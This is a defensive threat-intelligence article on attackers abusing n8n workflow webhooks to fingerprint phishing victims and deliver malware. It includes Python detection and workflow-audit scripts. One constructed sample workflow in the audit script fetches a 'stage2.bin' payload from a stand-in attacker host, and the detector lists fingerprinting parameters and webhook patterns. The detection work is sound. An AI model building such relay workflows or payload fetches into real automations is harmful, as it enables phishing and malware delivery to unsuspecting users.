RESEARCH ANALYSIS

Trusted Infrastructure Turned Weapon: How Threat Actors Are Hijacking n8n Automation to Bypass Email Security

Attackers have weaponized the n8n workflow automation platform since October 2025, using its trusted webhooks to deliver malware and fingerprint victims through phishing campaigns.

2026-04-16 · Source: The Hacker News

This analysis is based on research published by The Hacker News. CypherByte adds independent assessment, context, expanded threat intelligence, and security team recommendations.

Executive Summary

Since at least October 2025, threat actors have been systematically abusing n8n, a widely adopted open-source workflow automation platform with built-in AI integrations, to run phishing campaigns that bypass conventional email security controls. By embedding malicious logic inside legitimate, trusted automation infrastructure, the attackers have turned productivity tooling into a covert delivery mechanism for malware payloads and device fingerprinting. Security teams that rely on domain reputation, sender verification, or signature-based filtering alone are particularly exposed, because the attack traffic originates from infrastructure most organizations implicitly trust.

This research is immediately relevant to security operations centers, email security architects, threat intelligence teams, and any organization that has deployed or permits third-party access to workflow automation platforms. The abuse of legitimate services for malicious delivery — a technique sometimes categorized under Living-off-Trusted-Sites (LoTS) — represents one of the most operationally challenging threat categories defenders face today. The n8n campaign is a textbook escalation of this approach, demonstrating that attackers are not just exploiting software vulnerabilities but actively engineering around trust models baked into enterprise security infrastructure.

Key Finding: Threat actors are not exploiting a vulnerability in n8n itself — they are abusing its legitimate webhook and automation functionality as a trusted delivery relay, making this a trust-model attack rather than a traditional exploit campaign.

Technical Analysis

n8n lets users build automated workflows that fire on external events, and publicly reachable webhook endpoints are a core feature: a Webhook trigger node listens at /webhook/<path> on the instance's base URL (and at /webhook-test/<path> while a workflow is being tested), where <path> defaults to a generated UUID but can be set to any string. In a legitimate deployment, these endpoints receive HTTP requests and trigger downstream tasks such as sending email, processing data, calling APIs, or executing scripts. Attackers in this campaign have registered or compromised n8n instances and built workflows specifically designed to serve as phishing relay infrastructure.

The attack chain, as assessed from available intelligence, operates in multiple stages. In the initial phase, victims receive phishing emails that either originate from or link through n8n-hosted infrastructure. Because n8n instances may run on well-regarded cloud providers or share infrastructure with legitimate enterprise deployments, the sending domains and IP ranges frequently carry favorable sender reputation. SPF and DKIM offer little help here: mail sent through properly configured infrastructure passes both checks legitimately, and a passing result proves only that the message came from where it claims, not that it is benign. The net effect is that the messages pass through, or receive reduced scrutiny from, Secure Email Gateways (SEGs) and threat intelligence blocklists, and the embedded link points at a domain that reputation systems have no reason to distrust.

Upon victim interaction — typically clicking a link — two distinct malicious outcomes have been observed. The first is device fingerprinting, where the n8n webhook silently collects browser telemetry, IP geolocation, User-Agent strings, installed font data, screen resolution, and other environmental signals. This reconnaissance data is passed back to attacker-controlled infrastructure to profile targets before deciding whether to escalate the attack or discard non-viable victims. The second outcome is direct malware payload delivery, where the automation workflow conditionally serves malicious files — potentially varying the payload based on the fingerprinting data already collected, enabling highly targeted delivery depending on the victim's operating system, browser, or corporate network indicators.

The workflow automation layer also provides attackers with an operationally convenient dead-drop and relay mechanism. Because n8n workflows can chain multiple external service calls, the actual command-and-control infrastructure can remain several hops removed from the initial phishing contact point, significantly complicating forensic attribution and infrastructure takedown efforts. Defenders attempting to block attack infrastructure by IP or domain face a moving target problem compounded by the shared and legitimate nature of the hosting environment.

Technique Classification: This campaign aligns with MITRE ATT&CK techniques including T1566.002 (Phishing: Spearphishing Link), T1583.006 (Acquire Infrastructure: Web Services), T1102 (Web Service) for the relay and dead-drop role the workflow plays, and T1592.004 (Gather Victim Host Information: Client Configurations) for the browser fingerprinting component, which collects client telemetry before any payload executes on the host.

Impact Assessment

The affected surface area is broad. Any organization whose employees receive external email — which is functionally every organization — is exposed to the phishing delivery component. Environments with permissive URL-filtering policies around known SaaS and automation platforms are at elevated risk, as n8n.io and self-hosted n8n subdomains may be explicitly whitelisted or carry automatic trust. Sectors that have been historically targeted by phishing-as-initial-access campaigns — financial services, healthcare, technology, and critical infrastructure — should treat this as an active and elevated threat.

For organizations that themselves operate n8n instances, there is an additional and serious secondary risk: reputational and legal exposure. If a self-hosted n8n deployment is compromised or misconfigured to allow unauthorized workflow creation, that organization's infrastructure could become an unwitting relay in attacks against third parties. This creates liability concerns and potential regulatory implications, particularly under frameworks like GDPR, HIPAA, and emerging U.S. state-level cybersecurity statutes. The real-world consequences extend beyond individual victim compromise to systemic erosion of trust in the workflow automation category as a class of enterprise tooling.

CypherByte's Perspective

This campaign reflects a broader and accelerating shift in the threat landscape: attackers are investing in trust exploitation rather than technical exploitation. Zero-day vulnerabilities are expensive to acquire and burn quickly. Abusing a legitimate, well-maintained, and broadly trusted platform costs comparatively little, scales readily, and sidesteps controls that enterprises have spent heavily to build. The n8n campaign is not an isolated incident; it sits within a lineage that includes abuse of Google Sites, Cloudflare Workers, Notion, GitHub, and dozens of other trusted platforms as phishing and malware delivery infrastructure.

From a mobile security perspective, a core focus of CypherByte's research mandate, this campaign carries specific implications. Mobile devices are disproportionately exposed to this attack pattern for several compounding reasons. Mobile email clients generally show less URL metadata to the user, making it harder to spot a redirect chain passing through n8n infrastructure. Mobile browsers are typically less instrumented for enterprise security monitoring. And the fingerprinting component is effective against mobile targets: the User-Agent string, screen geometry, touch support, timezone, language, and similar signals are available to any page without a prompt, and together they are enough to distinguish a corporate handset from an analyst's sandbox. The higher-value signals are gated, which is the one practical limit on the technique: precise geolocation requires an explicit permission grant, the Battery Status API is unavailable in Firefox and Safari, and network-type information is exposed only by some Chromium-based browsers, so a script that asks for them risks alerting the user. Organizations with BYOD policies or unmanaged mobile endpoints should treat this threat as directly applicable to their mobile fleet.

Indicators and Detection

Security teams should implement monitoring and detection logic targeting the following indicators and behavioral patterns associated with this campaign:

Network and Email Indicators: Look for outbound HTTP/HTTPS requests or inbound email links whose path begins with /webhook/ or /webhook-test/ on hosts associated with n8n: n8n Cloud tenants receive webhooks on per-tenant subdomains of app.n8n.cloud (not on n8n.io itself), and self-hosted deployments typically sit on an organization's own hostname (e.g., n8n.yourdomain.com/webhook/[UUID]). The webhook path defaults to a UUID but is attacker-chosen, so match on the /webhook/ prefix rather than on the UUID shape alone. Webhook URLs arriving via email, particularly in unsolicited messages, should be treated as high-suspicion. Monitor for POST requests carrying browser telemetry parameters (screen, fonts, timezone, plugins) to external automation endpoints.

Behavioral Detection: Email security platforms should flag messages containing links that redirect through workflow automation infrastructure prior to reaching a final destination. Chains of two or more redirects — especially those passing through known automation or no-code platforms — should trigger sandbox detonation regardless of the domain's reputation score. Endpoint detection solutions should flag processes spawned from browser interactions that exhibit post-exploitation behavior consistent with initial access payloads.
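The indicator logic described above, as an added example that is not part of the original reporting or of n8n's own tooling. It scores URLs for the webhook path and host shapes n8n uses, counts fingerprinting parameters in POST bodies, checks a resolved redirect chain for a webhook relay hop, and runs all of that over a few constructed proxy log lines. The log format, the parameter-name list, the scoring thresholds, and the "n8n." self-hosted naming convention are assumptions to adapt to your own environment; the /webhook/ and /webhook-test/ path prefixes and the app.n8n.cloud tenant domain are real.

```python
import re
from urllib.parse import urlsplit, parse_qs

# n8n serves production webhooks under /webhook/<path> and test webhooks under
# /webhook-test/<path>; <path> defaults to a UUID but is user-chosen.
WEBHOOK_PATH = re.compile(r"^/webhook(?:-test)?/([^/?#]+)", re.I)
UUID_RE = re.compile(r"^[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}$", re.I)
# n8n Cloud tenants live under app.n8n.cloud. An "n8n." subdomain is a common
# self-hosted naming convention (assumption; replace with your inventory).
AUTOMATION_HOST = re.compile(r"(?:^|\.)app\.n8n\.cloud$|^n8n\.", re.I)

# Parameter names whose co-occurrence characterises a fingerprint beacon (assumed set).
FP_PARAMS = {"screen", "fonts", "timezone", "plugins", "ua", "platform",
             "language", "canvas", "webgl", "touch", "battery", "conn"}
FP_THRESHOLD = 3

def classify_url(url):
    """Score a URL for n8n webhook relay characteristics; returns (score, reasons)."""
    u = urlsplit(url)
    score, reasons = 0, []
    m = WEBHOOK_PATH.match(u.path)
    if m:
        score += 3
        reasons.append("webhook path")
        if UUID_RE.match(m.group(1)):
            score += 1
            reasons.append("uuid webhook id")
    if AUTOMATION_HOST.search(u.hostname or ""):
        score += 2
        reasons.append("automation host")
    return score, reasons

def fingerprint_params(body):
    """Fingerprinting parameter names present in a form-encoded request body."""
    return sorted(FP_PARAMS & set(parse_qs(body, keep_blank_values=True)))

def redirect_chain_risk(hops):
    """Flag a fully resolved redirect chain that passes through a webhook relay."""
    relay = [h for h in hops if classify_url(h)[0] >= 3]
    return len(hops) >= 2 and bool(relay), relay

def analyze_log(lines):
    """Scan constructed proxy lines of the form
    '<ts> <client> <method> <url> <status> <bytes> [<body>]' (body only from a
    TLS-inspecting proxy; assumed format)."""
    findings = []
    for line in lines:
        parts = line.split(None, 6)
        if len(parts) < 6:
            continue
        ts, client, method, url = parts[:4]
        body = parts[6] if len(parts) == 7 else ""
        score, reasons = classify_url(url)
        fp = fingerprint_params(body) if method.upper() == "POST" else []
        if len(fp) >= FP_THRESHOLD:
            score += 3
            reasons.append("fingerprint beacon: " + ",".join(fp))
        if score >= 3:
            findings.append({"ts": ts, "client": client, "url": url,
                             "score": score, "reasons": reasons})
    return findings

# Constructed sample traffic (not real indicators): the click on a mailed link,
# the beacon the landing page posts back, and ordinary traffic for contrast.
SAMPLE_LOG = [
    "2026-04-14T09:12:01Z 10.0.4.23 GET https://tenant-a1b2.app.n8n.cloud/webhook/6f1c2b3a-9d4e-4f5a-8b6c-1d2e3f4a5b6c?u=victim 302 0",
    "2026-04-14T09:12:02Z 10.0.4.23 POST https://tenant-a1b2.app.n8n.cloud/webhook/6f1c2b3a-9d4e-4f5a-8b6c-1d2e3f4a5b6c 200 412 screen=1440x900&timezone=Europe%2FBerlin&fonts=Arial%2CCalibri&plugins=&platform=Win32",
    "2026-04-14T09:12:40Z 10.0.4.57 GET https://www.example.com/login 200 8831",
    "2026-04-14T09:13:05Z 10.0.4.57 POST https://www.example.com/api/search 200 120 q=quarterly+report&page=2",
]

if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f["score"], f["client"], f["url"], f["reasons"])
```

The two n8n lines score 6 and 9 while the example.com lines score 0. The host regex alone scores only 2, below the alert threshold, so legitimate n8n traffic that never touches a webhook path does not page anyone; the path prefix is what carries the weight, because it is the one thing the attacker cannot change.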

Internal n8n Instance Monitoring: Organizations running n8n should audit all active workflows for externally-triggered webhook definitions, particularly those with email-sending actions, file-serving capabilities, or external API calls to non-approved domains. Unauthorized workflow creation should generate immediate alerts.

Detection Priority: Redirect chains passing through /webhook/ URL paths on automation platforms should be treated as high-priority for sandbox analysis, regardless of the hosting domain's baseline reputation score.

Recommendations

1. Reassess trust assumptions for SaaS and automation platforms in email security policy. Explicitly whitelisted automation platform domains — including n8n.io and self-hosted equivalents — should be removed from bypass lists in Secure Email Gateways. All URLs should be subject to full inspection and sandboxed detonation regardless of domain reputation.

2. Deploy time-of-click URL scanning with redirect chain analysis. Static link analysis at email receipt is insufficient for this attack pattern. Implement solutions that re-evaluate URLs at the moment of user click, with full resolution of multi-hop redirect chains, to catch n8n relay infrastructure that may not have been flagged at delivery time.

3. Audit and harden all self-hosted n8n deployments immediately. Inventory every n8n instance in the environment, including developer and test instances. Webhook endpoints are anonymous by default: n8n's user management protects the editor UI and API, not /webhook/ paths, so enable the Webhook node's Authentication option (Basic Auth or Header Auth) on every externally reachable trigger and reject unauthenticated requests. Review all active workflows against an approved baseline, restrict outbound workflow actions (HTTP Request, email, and messaging nodes) to an allowlist of destinations, and keep the editor and API behind authentication and, where possible, off the public internet.

4. Extend mobile device management policy to address LoTS threats. Organizations should ensure that mobile email clients are covered by the same URL inspection and redirect analysis capabilities applied to desktop environments. Where technical controls are not feasible on unmanaged devices, compensating controls such as user awareness training specific to automation-platform-based phishing should be implemented.

5. Implement behavioral anomaly detection for browser telemetry exfiltration. Network monitoring should be tuned to identify HTTP requests carrying fingerprinting parameter sets — particularly from user endpoints following email link clicks. These requests, even when targeting trusted-appearing infrastructure, may represent the reconnaissance phase of a targeted attack.

6. Brief threat intelligence teams on the LoTS category broadly. The n8n campaign should be treated as a signal, not a singular event. Security teams should proactively model which other automation, collaboration, and productivity platforms within their environment could be abused under the same trust-exploitation framework, and pre-emptively apply appropriate detection and control logic.
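The workflow review described under Internal n8n Instance Monitoring and in recommendation 3, as an added example that is not part of the original reporting or of n8n's own tooling. It takes a workflow export (the JSON array written by n8n's CLI `export:workflow --all` command, a page from the `/api/v1/workflows` REST endpoint, or a single exported workflow), finds every Webhook trigger, walks the connection graph from it, and reports unauthenticated triggers plus any HTTP Request, email, code-execution, or Respond to Webhook node an anonymous caller can reach. The node type identifiers and the `connections` layout are n8n's; the approved-host list, the severity labels, and the sample export are constructed assumptions.

```python
import json
from collections import deque
from urllib.parse import urlsplit

# Destinations workflows may call (assumption: replace with your own allowlist).
APPROVED_HOSTS = {"api.internal.example.com"}

WEBHOOK_TRIGGER = "n8n-nodes-base.webhook"
HTTP_REQUEST = "n8n-nodes-base.httpRequest"
RESPOND = "n8n-nodes-base.respondToWebhook"
EMAIL_NODES = {"n8n-nodes-base.emailSend", "n8n-nodes-base.gmail",
               "n8n-nodes-base.microsoftOutlook"}
EXEC_NODES = {"n8n-nodes-base.executeCommand", "n8n-nodes-base.code",
              "n8n-nodes-base.ssh"}

def load_export(text):
    """Accept a CLI --all export (JSON array), a REST page ({"data": [...]}),
    or a single exported workflow object; always return a list of workflows."""
    data = json.loads(text)
    if isinstance(data, dict):
        data = data["data"] if "data" in data else [data]
    return data

def reachable(wf, start):
    """Names of nodes reachable from `start` through the export's connection graph."""
    conns = wf.get("connections", {})
    seen, queue = set(), deque([start])
    while queue:
        name = queue.popleft()
        for outputs in conns.get(name, {}).values():   # "main", "ai_tool", ...
            for slot in outputs:
                for edge in slot:
                    target = edge.get("node")
                    if target and target not in seen:
                        seen.add(target)
                        queue.append(target)
    return seen

def audit_workflow(wf, approved=APPROVED_HOSTS):
    """Return sorted (severity, message) findings for one workflow."""
    nodes = {n["name"]: n for n in wf.get("nodes", [])}
    findings = []
    for name, node in nodes.items():
        if node.get("type") != WEBHOOK_TRIGGER:
            continue
        # n8n omits default values from exports, so a missing key means "none".
        if node.get("parameters", {}).get("authentication", "none") == "none":
            findings.append(("high", f"{name}: webhook trigger accepts unauthenticated requests"))
        for dst in reachable(wf, name):
            d = nodes.get(dst, {})
            dtype, dparams = d.get("type", ""), d.get("parameters", {})
            if dtype == HTTP_REQUEST:
                url = str(dparams.get("url", ""))
                host = urlsplit(url).hostname or ""
                if url.startswith("="):
                    findings.append(("high", f"{dst}: HTTP Request URL is an expression, so caller input can steer the destination"))
                elif host not in approved:
                    findings.append(("high", f"{dst}: outbound HTTP to non-approved host {host}"))
            elif dtype in EMAIL_NODES:
                findings.append(("medium", f"{dst}: sends email on an externally triggered path"))
            elif dtype in EXEC_NODES:
                findings.append(("high", f"{dst}: code or command execution reachable from the webhook"))
            elif dtype == RESPOND:
                findings.append(("info", f"{dst}: returns workflow output to the anonymous caller"))
    return sorted(findings)

def audit_export(text, approved=APPROVED_HOSTS):
    return {wf.get("name", "?"): audit_workflow(wf, approved) for wf in load_export(text)}

# Constructed sample export: one relay-shaped workflow and one benign one.
SAMPLE_EXPORT = json.dumps([
    {"name": "invoice-notify", "active": True,
     "nodes": [
         {"name": "Webhook", "type": WEBHOOK_TRIGGER,
          "parameters": {"path": "6f1c2b3a-9d4e-4f5a-8b6c-1d2e3f4a5b6c",
                         "httpMethod": "POST", "responseMode": "responseNode"}},
         {"name": "Fetch payload", "type": HTTP_REQUEST,
          "parameters": {"url": "https://cdn.example-attacker.test/stage2.bin"}},
         {"name": "Send Email", "type": "n8n-nodes-base.emailSend",
          "parameters": {"toEmail": "={{ $json.body.to }}"}},
         {"name": "Respond", "type": RESPOND, "parameters": {}}],
     "connections": {
         "Webhook": {"main": [[{"node": "Fetch payload", "type": "main", "index": 0}]]},
         "Fetch payload": {"main": [[{"node": "Send Email", "type": "main", "index": 0},
                                     {"node": "Respond", "type": "main", "index": 0}]]}}},
    {"name": "ticket-sync", "active": True,
     "nodes": [
         {"name": "Webhook", "type": WEBHOOK_TRIGGER,
          "parameters": {"path": "tickets", "httpMethod": "POST", "authentication": "headerAuth"}},
         {"name": "Internal API", "type": HTTP_REQUEST,
          "parameters": {"url": "https://api.internal.example.com/tickets"}}],
     "connections": {"Webhook": {"main": [[{"node": "Internal API", "type": "main", "index": 0}]]}}},
])

if __name__ == "__main__":
    for wf_name, findings in audit_export(SAMPLE_EXPORT).items():
        print(wf_name, findings or "clean")
```

Run it against a fresh export on a schedule and diff the output against the last approved run; a new high finding on an active workflow is the "unauthorized workflow creation" alert the monitoring section asks for, without needing access to the n8n database.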

CypherByte continues to monitor this campaign for infrastructure updates, new payload variants, and expansion to additional automation platforms. This analysis will be updated as new intelligence becomes available. Original reporting credit: The Hacker News.
